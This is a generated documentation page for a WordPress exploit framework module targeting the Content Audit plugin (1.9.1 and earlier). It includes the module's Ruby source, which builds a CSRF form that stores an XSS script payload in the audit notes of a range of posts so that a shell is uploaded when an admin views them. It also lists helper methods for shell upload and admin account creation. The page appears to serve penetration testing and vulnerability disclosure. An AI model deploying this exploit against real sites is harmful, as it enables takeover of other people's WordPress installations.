Class: Wpxf::Exploit::ContentAuditCsrfStoredXssShellUpload

Inherits:
Module
  • Object
show all
Includes:
WordPress::StagedReflectedXss
Defined in:
lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::StagedReflectedXss

#create_basic_post_script, #initial_req_path, #on_http_request, #run, #url_with_xss

Methods included from WordPress::ReflectedXss

#run

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute, #upload_payload_using_plugin_form

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeContentAuditCsrfStoredXssShellUpload

Returns a new instance of ContentAuditCsrfStoredXssShellUpload.



6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
 
# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 6

def initialize
  super

  update_info(
    name: 'Content Audit <= 1.9.1 CSRF Stored XSS Shell Upload',
    desc: %(
      Versions up to and including 1.9.1 of the Content Audit plugin suffer
      from a CSRF and encoding issue, allowing for a JavaScript payload to
      be stored in the notes against a page.

      This module will create a link, which when clicked by an admin, will
      store the payload against all auditable items with an ID in the specified
      range. By default, Content Audit ships with only pages audited, but posts
      can also be audited. The payload will be executed the next time an admin
      views the page / post management area, with one of the infected items
      visible in the list.

      Note: If a specified post ID has not been yet assigned a post / page, the
      payload will be stored and executed when the ID is eventually assigned to
      a new post / page.
    ),
    desc_preformatted: true,
    author: [
      'Tom Adams', # Disclosure
      'rastating'  # WPXF module
    ],
    references: [
      ['WPVDB', '8915'],
      ['URL', 'http://seclists.org/fulldisclosure/2017/Sep/73'],
      ['URL', 'https://security.dxw.com/advisories/csrf-xss-content-audit/']
    ],
    date: 'Aug 21 2017'
  )

  register_options([
    IntegerOption.new(
      name: 'first_post_id',
      desc: 'The first post ID to store the payload against',
      required: true,
      default: 1
    ),
    IntegerOption.new(
      name: 'last_post_id',
      desc: 'The last post ID to store the payload against',
      required: true,
      default: 100
    )
  ])
end

Instance Method Details

#checkObject 



56
57
58
 
# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 56

def check
  check_plugin_version_from_readme('content-audit', '1.9.2')
end

#first_post_idObject 



64
65
66
 
# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 64

def first_post_id
  normalized_option_value('first_post_id')
end

#initial_scriptObject 



72
73
74
75
76
77
78
79
80
81
82
 
# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 72

def initial_script
  fields = {
    'action'                         => 'content_audit_save_bulk_edit',
    '_content_audit_owner'           => Utility::Text.rand_alphanumeric(10),
    '_content_audit_expiration_date' => (Date.today + 7).strftime('%Y-%m-%d'),
    '_content_audit_notes'           => "<script>#{xss_ascii_encoded_include_script}<\\/script>"
  }

  Array(first_post_id..last_post_id).each_with_index { |id, index| fields["post_ids[#{index}]"] = id }
  create_basic_post_script vulnerable_url, fields
end

#last_post_idObject 



68
69
70
 
# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 68

def last_post_id
  normalized_option_value('last_post_id')
end

#vulnerable_urlObject 



60
61
62
 
# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 60

def vulnerable_url
  wordpress_url_admin_ajax
end